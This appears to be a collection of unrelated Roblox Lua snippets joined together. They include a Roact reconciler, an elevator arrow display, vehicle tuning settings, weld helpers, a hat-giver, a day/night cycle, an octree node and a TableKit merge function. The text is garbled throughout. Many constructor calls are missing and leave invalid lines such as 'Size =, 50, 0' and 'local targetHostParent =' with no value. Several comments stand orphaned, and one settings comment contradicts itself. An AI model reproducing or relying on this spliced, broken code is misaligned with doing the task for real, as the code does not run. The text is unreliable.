self.frame.ImageLabel.ImageTransparency = perc self.frame.ImageLabel.Size =, 50, 0, -50 * (1 - perc)) end end function Indicator:updateAll() local i = 1 while i <= #Indicator.all do local indicator = Indicator.all[i] indicator:update() if indicator.alive then i = i + 1 end end end
--[[ The reconciler is the mechanism in Roact that constructs the virtual tree that later gets turned into concrete objects by the renderer. Roact's reconciler is constructed with the renderer as an argument, which enables switching to different renderers for different platforms or scenarios. When testing the reconciler itself, it's common to use `NoopRenderer` with spies replacing some methods. The default (and only) reconciler interface exposed by Roact right now uses `RobloxRenderer`. ]]
local function createReconciler(renderer) local reconciler local mountVirtualNode local updateVirtualNode local unmountVirtualNode --[[ Unmount the given virtualNode, replacing it with a new node described by the given element. Preserves host properties, depth, and context from parent. ]] local function replaceVirtualNode(virtualNode, newElement) local hostParent = virtualNode.hostParent local hostKey = virtualNode.hostKey local depth = virtualNode.depth local parentContext = virtualNode.parentContext unmountVirtualNode(virtualNode) local newNode = mountVirtualNode(newElement, hostParent, hostKey, parentContext) -- mountVirtualNode can return nil if the element is a boolean if newNode ~= nil then newNode.depth = depth end return newNode end --[[ Utility to update the children of a virtual node based on zero or more updated children given as elements. ]] local function updateChildren(virtualNode, hostParent, newChildElements) if config.internalTypeChecks then internalAssert(Type.of(virtualNode) == Type.VirtualNode, "Expected arg #1 to be of type VirtualNode") end local removeKeys = {} -- Changed or removed children for childKey, childNode in pairs(virtualNode.children) do local newElement = ElementUtils.getElementByKey(newChildElements, childKey) local newNode = updateVirtualNode(childNode, newElement) if newNode ~= nil then virtualNode.children[childKey] = newNode else removeKeys[childKey] = true end end for childKey in pairs(removeKeys) do virtualNode.children[childKey] = nil end -- Added children for childKey, newElement in ElementUtils.iterateElements(newChildElements) do local concreteKey = childKey if childKey == ElementUtils.UseParentKey then concreteKey = virtualNode.hostKey end if virtualNode.children[childKey] == nil then local childNode = mountVirtualNode(newElement, hostParent, concreteKey, virtualNode.context) -- mountVirtualNode can return nil if the element is a boolean if childNode ~= nil then childNode.depth = virtualNode.depth + 1 virtualNode.children[childKey] = childNode end end end end local function updateVirtualNodeWithChildren(virtualNode, hostParent, newChildElements) updateChildren(virtualNode, hostParent, newChildElements) end local function updateVirtualNodeWithRenderResult(virtualNode, hostParent, renderResult) if Type.of(renderResult) == Type.Element or renderResult == nil or typeof(renderResult) == "boolean" then updateChildren(virtualNode, hostParent, renderResult) else error(("%s\n%s"):format( "Component returned invalid children:", virtualNode.currentElement.source or "<enable element tracebacks>" ), 0) end end --[[ Unmounts the given virtual node and releases any held resources. ]] function unmountVirtualNode(virtualNode) if config.internalTypeChecks then internalAssert(Type.of(virtualNode) == Type.VirtualNode, "Expected arg #1 to be of type VirtualNode") end local kind = ElementKind.of(virtualNode.currentElement) if kind == ElementKind.Host then renderer.unmountHostNode(reconciler, virtualNode) elseif kind == ElementKind.Function then for _, childNode in pairs(virtualNode.children) do unmountVirtualNode(childNode) end elseif kind == ElementKind.Stateful then virtualNode.instance:__unmount() elseif kind == ElementKind.Portal then for _, childNode in pairs(virtualNode.children) do unmountVirtualNode(childNode) end elseif kind == ElementKind.Fragment then for _, childNode in pairs(virtualNode.children) do unmountVirtualNode(childNode) end else error(("Unknown ElementKind %q"):format(tostring(kind), 2)) end end local function updateFunctionVirtualNode(virtualNode, newElement) local children = newElement.component(newElement.props) updateVirtualNodeWithRenderResult(virtualNode, virtualNode.hostParent, children) return virtualNode end local function updatePortalVirtualNode(virtualNode, newElement) local oldElement = virtualNode.currentElement local oldTargetHostParent = local targetHostParent = assert(renderer.isHostObject(targetHostParent), "Expected target to be host object") if targetHostParent ~= oldTargetHostParent then return replaceVirtualNode(virtualNode, newElement) end local children = newElement.props[Children] updateVirtualNodeWithChildren(virtualNode, targetHostParent, children) return virtualNode end local function updateFragmentVirtualNode(virtualNode, newElement) updateVirtualNodeWithChildren(virtualNode, virtualNode.hostParent, newElement.elements) return virtualNode end --[[ Update the given virtual node using a new element describing what it should transform into. `updateVirtualNode` will return a new virtual node that should replace the passed in virtual node. This is because a virtual node can be updated with an element referencing a different component! In that case, `updateVirtualNode` will unmount the input virtual node, mount a new virtual node, and return it in this case, while also issuing a warning to the user. ]] function updateVirtualNode(virtualNode, newElement, newState) if config.internalTypeChecks then internalAssert(Type.of(virtualNode) == Type.VirtualNode, "Expected arg #1 to be of type VirtualNode") end if config.typeChecks then assert( Type.of(newElement) == Type.Element or typeof(newElement) == "boolean" or newElement == nil, "Expected arg #2 to be of type Element, boolean, or nil" ) end -- If nothing changed, we can skip this update if virtualNode.currentElement == newElement and newState == nil then return virtualNode end if typeof(newElement) == "boolean" or newElement == nil then unmountVirtualNode(virtualNode) return nil end if virtualNode.currentElement.component ~= newElement.component then return replaceVirtualNode(virtualNode, newElement) end local kind = ElementKind.of(newElement) local shouldContinueUpdate = true if kind == ElementKind.Host then virtualNode = renderer.updateHostNode(reconciler, virtualNode, newElement) elseif kind == ElementKind.Function then virtualNode = updateFunctionVirtualNode(virtualNode, newElement) elseif kind == ElementKind.Stateful then shouldContinueUpdate = virtualNode.instance:__update(newElement, newState) elseif kind == ElementKind.Portal then virtualNode = updatePortalVirtualNode(virtualNode, newElement) elseif kind == ElementKind.Fragment then virtualNode = updateFragmentVirtualNode(virtualNode, newElement) else error(("Unknown ElementKind %q"):format(tostring(kind), 2)) end -- Stateful components can abort updates via shouldUpdate. If that -- happens, we should stop doing stuff at this point. if not shouldContinueUpdate then return virtualNode end virtualNode.currentElement = newElement return virtualNode end --[[ Constructs a new virtual node but not does mount it. ]] local function createVirtualNode(element, hostParent, hostKey, context) if config.internalTypeChecks then internalAssert(renderer.isHostObject(hostParent) or hostParent == nil, "Expected arg #2 to be a host object") internalAssert(typeof(context) == "table" or context == nil, "Expected arg #4 to be of type table or nil") end if config.typeChecks then assert(hostKey ~= nil, "Expected arg #3 to be non-nil") assert( Type.of(element) == Type.Element or typeof(element) == "boolean", "Expected arg #1 to be of type Element or boolean" ) end return { [Type] = Type.VirtualNode, currentElement = element, depth = 1, children = {}, hostParent = hostParent, hostKey = hostKey, context = context, -- This copy of context is useful if the element gets replaced -- with an element of a different component type parentContext = context, } end local function mountFunctionVirtualNode(virtualNode) local element = virtualNode.currentElement local children = element.component(element.props) updateVirtualNodeWithRenderResult(virtualNode, virtualNode.hostParent, children) end local function mountPortalVirtualNode(virtualNode) local element = virtualNode.currentElement local targetHostParent = local children = element.props[Children] assert(renderer.isHostObject(targetHostParent), "Expected target to be host object") updateVirtualNodeWithChildren(virtualNode, targetHostParent, children) end local function mountFragmentVirtualNode(virtualNode) local element = virtualNode.currentElement local children = element.elements updateVirtualNodeWithChildren(virtualNode, virtualNode.hostParent, children) end --[[ Constructs a new virtual node and mounts it, but does not place it into the tree. ]] function mountVirtualNode(element, hostParent, hostKey, context) if config.internalTypeChecks then internalAssert(renderer.isHostObject(hostParent) or hostParent == nil, "Expected arg #2 to be a host object") internalAssert(typeof(context) == "table" or context == nil, "Expected arg #4 to be of type table or nil") end if config.typeChecks then assert(hostKey ~= nil, "Expected arg #3 to be non-nil") assert( Type.of(element) == Type.Element or typeof(element) == "boolean", "Expected arg #1 to be of type Element or boolean" ) end -- Boolean values render as nil to enable terse conditional rendering. if typeof(element) == "boolean" then return nil end local kind = ElementKind.of(element) local virtualNode = createVirtualNode(element, hostParent, hostKey, context) if kind == ElementKind.Host then renderer.mountHostNode(reconciler, virtualNode) elseif kind == ElementKind.Function then mountFunctionVirtualNode(virtualNode) elseif kind == ElementKind.Stateful then if element.component.__mount == nil then print("Nil component!") for k, v in pairs(element) do print(k, v) end print("component props") for k, v in pairs(element.component) do print(k, v) end end element.component:__mount(reconciler, virtualNode) elseif kind == ElementKind.Portal then mountPortalVirtualNode(virtualNode) elseif kind == ElementKind.Fragment then mountFragmentVirtualNode(virtualNode) else error(("Unknown ElementKind %q"):format(tostring(kind), 2)) end return virtualNode end --[[ Constructs a new Roact virtual tree, constructs a root node for it, and mounts it. ]] local function mountVirtualTree(element, hostParent, hostKey) if config.typeChecks then assert(Type.of(element) == Type.Element, "Expected arg #1 to be of type Element") assert(renderer.isHostObject(hostParent) or hostParent == nil, "Expected arg #2 to be a host object") end if hostKey == nil then hostKey = "RoactTree" end local tree = { [Type] = Type.VirtualTree, [InternalData] = { -- The root node of the tree, which starts into the hierarchy of -- Roact component instances. rootNode = nil, mounted = true, }, } tree[InternalData].rootNode = mountVirtualNode(element, hostParent, hostKey) return tree end --[[ Unmounts the virtual tree, freeing all of its resources. No further operations should be done on the tree after it's been unmounted, as indicated by its the `mounted` field. ]] local function unmountVirtualTree(tree) local internalData = tree[InternalData] if config.typeChecks then assert(Type.of(tree) == Type.VirtualTree, "Expected arg #1 to be a Roact handle") assert(internalData.mounted, "Cannot unmounted a Roact tree that has already been unmounted") end internalData.mounted = false if internalData.rootNode ~= nil then unmountVirtualNode(internalData.rootNode) end end --[[ Utility method for updating the root node of a virtual tree given a new element. ]] local function updateVirtualTree(tree, newElement) local internalData = tree[InternalData] if config.typeChecks then assert(Type.of(tree) == Type.VirtualTree, "Expected arg #1 to be a Roact handle") assert(Type.of(newElement) == Type.Element, "Expected arg #2 to be a Roact Element") end internalData.rootNode = updateVirtualNode(internalData.rootNode, newElement) return tree end reconciler = { mountVirtualTree = mountVirtualTree, unmountVirtualTree = unmountVirtualTree, updateVirtualTree = updateVirtualTree, createVirtualNode = createVirtualNode, mountVirtualNode = mountVirtualNode, unmountVirtualNode = unmountVirtualNode, updateVirtualNode = updateVirtualNode, updateVirtualNodeWithChildren = updateVirtualNodeWithChildren, updateVirtualNodeWithRenderResult = updateVirtualNodeWithRenderResult, } return reconciler end return createReconciler
-- -- -- -- -- -- -- --DIRECTION SCROLL-- -- -- -- -- -- -- --
Elevator:WaitForChild("Direction").Changed:connect(function(val) if val == 1 then This.Display.ARW1.U.Material = Enum.Material.Neon This.Display.ARW1.U.Color = Color3.fromRGB(190, 104, 98) This.Display.ARW1.D.Material = Enum.Material.Glass This.Display.ARW1.D.Color = Color3.fromRGB(238,248,248) elseif val == -1 then This.Display.ARW1.D.Material = Enum.Material.Neon This.Display.ARW1.D.Color = Color3.fromRGB(190, 104, 98) This.Display.ARW1.U.Material = Enum.Material.Glass This.Display.ARW1.U.Color = Color3.fromRGB(238,248,248) else This.Display.ARW1.D.Material = Enum.Material.Glass This.Display.ARW1.D.Color = Color3.fromRGB(248,248,248) This.Display.ARW1.U.Material = Enum.Material.Glass This.Display.ARW1.U.Color = Color3.fromRGB(238,248,248) end end)
for i, v in pairs(CS:GetTagged(Tag)) do if v:IsA("Model") then RagdollModule:Setup(v) end end
local NPC = script.Parent local Humanoid = NPC:WaitForChild("Humanoid") local EmoteButton = NPC.Parent.Parent.Parent local EmoteID = EmoteButton.EmoteID local Animation ="Animation") Animation.Parent = NPC Animation.AnimationId = "rbxassetid://"..EmoteID.Value
--[[Weld functions]]
local JS = game:GetService("JointsService") local PGS_ON = workspace:PGSIsEnabled() function MakeWeld(x,y,type,s) if type==nil then type="Weld" end local,x) W.Part0=x W.Part1=y W.C0=x.CFrame:inverse()*x.CFrame W.C1=y.CFrame:inverse()*x.CFrame if type=="Motor" and s~=nil then W.MaxVelocity=s end return W end function ModelWeld(a,b) if a:IsA("BasePart") then MakeWeld(b,a,"Weld") elseif a:IsA("Model") then for i,v in pairs(a:GetChildren()) do ModelWeld(v,b) end end end function UnAnchor(a) if a:IsA("BasePart") then a.Anchored=false end for i,v in pairs(a:GetChildren()) do UnAnchor(v) end end
Tune.LoadDelay = 1 -- Delay before initializing chassis (in seconds) Tune.AutoStart = false -- Set to false if using manual ignition plugin Tune.AutoFlip = true -- Set to false if using manual flip plugin
--[[ function onKeyDown(key) local Character = Tool.Parent if Character:findFirstChild("Humanoid") == nil then return end if game.Players:GetPlayerFromCharacter(Character) == nil then return end local Humanoid = Character.Humanoid if Humanoid.Health < 0.01 then return end if key == "" then end end ]]
function SetCollide() if Tool:IsDescendantOf(game.Workspace) == true then Tool.On.Value = false for i = 1, #ToolPart do if ToolPart[i].className == "Part" then if ToolPart[i]:findFirstChild("Collide") ~= nil then if ToolPart[i]["Collide"].Value == false then ToolPart[i].CanCollide = false end else ToolPart[i].CanCollide = true end end end end if Tool:IsDescendantOf(game.Players) == true then for i = 1, #ToolPart do if ToolPart[i].className == "Part" then ToolPart[i].CanCollide = false end end end end Tool.Equipped:connect(Equip) Tool.Unequipped:connect(Unequip)
Tune.Config = "RWD" --"FWD" , "RWD" , "AWD" Tune.TorqueVector = 0 --AWD ONLY, "-1" has a 100% front bias, "0" has a 50:50 bias, and "1" has a 100% rear bias. Can be any number between that range. --Differential Settings Tune.FDiffSlipThres = 50 -- 1 - 100% (Max threshold of applying full lock determined by deviation from avg speed) Tune.FDiffLockThres = 50 -- 0 - 100% (0 - Bias toward slower wheel, 100 - Bias toward faster wheel) Tune.RDiffSlipThres = 80 -- 1 - 100% Tune.RDiffLockThres = 20 -- 0 - 100% Tune.CDiffSlipThres = 50 -- 1 - 100% [AWD Only] Tune.CDiffLockThres = 50 -- 0 - 100% [AWD Only] --Traction Control Settings Tune.TCSEnabled = false -- Implements TCS Tune.TCSThreshold = 20 -- Slip speed allowed before TCS starts working (in SPS) Tune.TCSGradient = 20 -- Slip speed gradient between 0 to max reduction (in SPS) Tune.TCSLimit = 10 -- Minimum amount of torque at max reduction (in percent)
-- If you want to know how to retexture a hat, read this:
debounce = true function onTouched(hit) if (hit.Parent:findFirstChild("Humanoid") ~= nil and debounce == true) then debounce = false h ="Hat") p ="Part") h.Name = "Hat" -- It doesn't make a difference, but if you want to make your place in Explorer neater, change this to the name of your hat. p.Parent = h p.Position = hit.Parent:findFirstChild("Head").Position p.Name = "Handle" p.formFactor = 0 p.Size =,-0,-1) p.BottomSurface = 0 p.TopSurface = 0 p.Locked = true script.Parent.Mesh:clone().Parent = p h.Parent = hit.Parent h.AttachmentPos =, 0.35, 0.15) -- Change these to change the positiones of your hat, as I said earlier. wait(5) debounce = true end end script.Parent.Touched:connect(onTouched)
-- randomize the random number generator
-- Open or close dev console
return function() local visible = starterGui:GetCore("DevConsoleVisible") starterGui:SetCore("DevConsoleVisible", not visible) end
-- Cleanup:
function Replica:IsActive() --> is_active [bool] return Replicas[self.Id] ~= nil end function Replica:AddCleanupTask(task) return self._maid:AddCleanupTask(task) end function Replica:RemoveCleanupTask(task) self._maid:RemoveCleanupTask(task) end
--[[ Hey, this is Cancels! Today I bring to you the Cancels CoreGui Settings, an invention by ... well ... ROBLOX. If you want to change a setting, do it like this! "true" = WILL show. "false" = WILL show. Don't mess with anything else. Bye, and cheers for taking! -Cancels --]]
Health_Bar = false Player_List = true Tool_Bar = true Chat = true
local hoursInDay = dayEnd-dayStart local hoursInNight = 24-hoursInDay local day = true local originalFog = game.Lighting.FogColor while true do local updateDelta = wait(updateTick) local step = 0 if game.Lighting.ClockTime >=dayStart and game.Lighting.ClockTime <=dayEnd then step = hoursInDay/daytimeInSeconds if not day then day = true local tween = TweenService:Create(game.Lighting,FogTweenInfo,{FogColor = originalFog}) tween:Play() end else step = hoursInNight/nightInSeconds if day then day = false local tween = TweenService:Create(game.Lighting,FogTweenInfo,{FogColor = Color3.fromRGB(50, 56, 66)}) tween:Play() end end game.Lighting.ClockTime += step*updateDelta end
--- Basic node interacting with the octree -- @classmod OctreeNode
local OctreeRegionUtils = require(script.Parent.OctreeRegionUtils) local OctreeNode = {} OctreeNode.ClassName = "OctreeNode" OctreeNode.__index = OctreeNode function, object) local self = setmetatable({}, OctreeNode) self._octree = octree or error("No octree") self._object = object or error("No object") self._currentLowestRegion = nil self._position = nil return self end function OctreeNode:KNearestNeighborsSearch(k, radius) return self._octree:KNearestNeighborsSearch(self._position, k, radius) end function OctreeNode:GetObject() return self._object end function OctreeNode:RadiusSearch(radius) return self._octree:RadiusSearch(self._position, radius) end function OctreeNode:GetPosition() return self._position end function OctreeNode:GetRawPosition() return self._px, self._py, self._pz end function OctreeNode:SetPosition(position) if self._position == position then return end local px, py, pz = position.x, position.y, position.z self._px = px self._py = py self._pz = pz self._position = position if self._currentLowestRegion then if OctreeRegionUtils.inRegionBounds(self._currentLowestRegion, px, py, pz) then return end end local newLowestRegion = self._octree:GetOrCreateLowestSubRegion(px, py, pz) -- Sanity check for debugging -- if not OctreeRegionUtils.inRegionBounds(newLowestRegion, px, py, pz) then -- error("[OctreeNode.SetPosition] newLowestRegion is not in region bounds!") -- end if self._currentLowestRegion then OctreeRegionUtils.moveNode(self._currentLowestRegion, newLowestRegion, self) else OctreeRegionUtils.addNode(newLowestRegion, self) end self._currentLowestRegion = newLowestRegion end function OctreeNode:Destroy() if self._currentLowestRegion then OctreeRegionUtils.removeNode(self._currentLowestRegion, self) end end return OctreeNode
-- Fire onRemoved() when something is removed from Model
--// All global vars will be wiped/replaced except script
return function(data, env) if env then setfenv(1, env) end local playergui = service.PlayerGui local localplayer = service.Players.LocalPlayer local scr = client.UI.Prepare(script.Parent.Parent) local main = scr.Main local t1 = main.Title local t2 = main.Message local msg = data.Message local color = data.Color --[[ local found = client.UI.Get("Output") if found then for i,v in pairs(found) do local p = v.Object if p and p.Parent then p.Main.Position =, 0, 0.35, p.Main.Position.Y.Offset+50) end end end--]] t2.Text = msg t2.Font = "Arial" --t2.Position =, 0, 0.35, 0) gTable.Ready() wait(5) gTable.Destroy() end
local force ="BodyForce") force.Parent = torso f = force Tool.Parent.Humanoid.WalkSpeed = 0 wait(0.01) elseif ison == 0 then if arms then sh[1].Part1 = arms[1] sh[2].Part1 = arms[2] f.Parent = nil arms[2].Name = "Right Leg" arms[1].Name = "Left Leg" welds[1].Parent = nil welds[2].Parent = nil Tool.Parent.Humanoid.WalkSpeed = 16 end end
--local PlaceId = 12095647369
local Players = game:GetService("Players") local DeathEvent = game.ReplicatedStorage.DeathEvent script.Parent.MouseButton1Click:Connect(function() --game:GetService("TeleportService"):Teleport(game.PlaceId) Players.LocalPlayer.Character:WaitForChild("Humanoid").Health = 0 DeathEvent:FireServer() print("1") end)
-- local LoadingImage = script.Parent.ImageLabel local tweenInfo =, Enum.EasingStyle.Linear, Enum.EasingDirection.In, -1) local tween = TweenService:Create(LoadingImage, tweenInfo, {Rotation=360}) tween:Play()
--[=[ Merges two arrays; array2 will be added to array1- this means that the indexes of array1 will be the same. ```lua local FirstArray = {"A", "B", "C", "D"} local SecondArray = {"E", "F", "G", "H"} print(TableKit.MergeArrays(FirstArray, SecondArray)) -- prints {"A", "B", "C", D", "E", "F", "G", "H"} ``` @within TableKit @param array1 table @param array2 table @return table ]=]
function TableKit.MergeArrays<a, b>(a: { unknown }, b: { unknown }): a & b local result = table.clone(a) table.move(b, 1, #b, #result + 1, result) return result end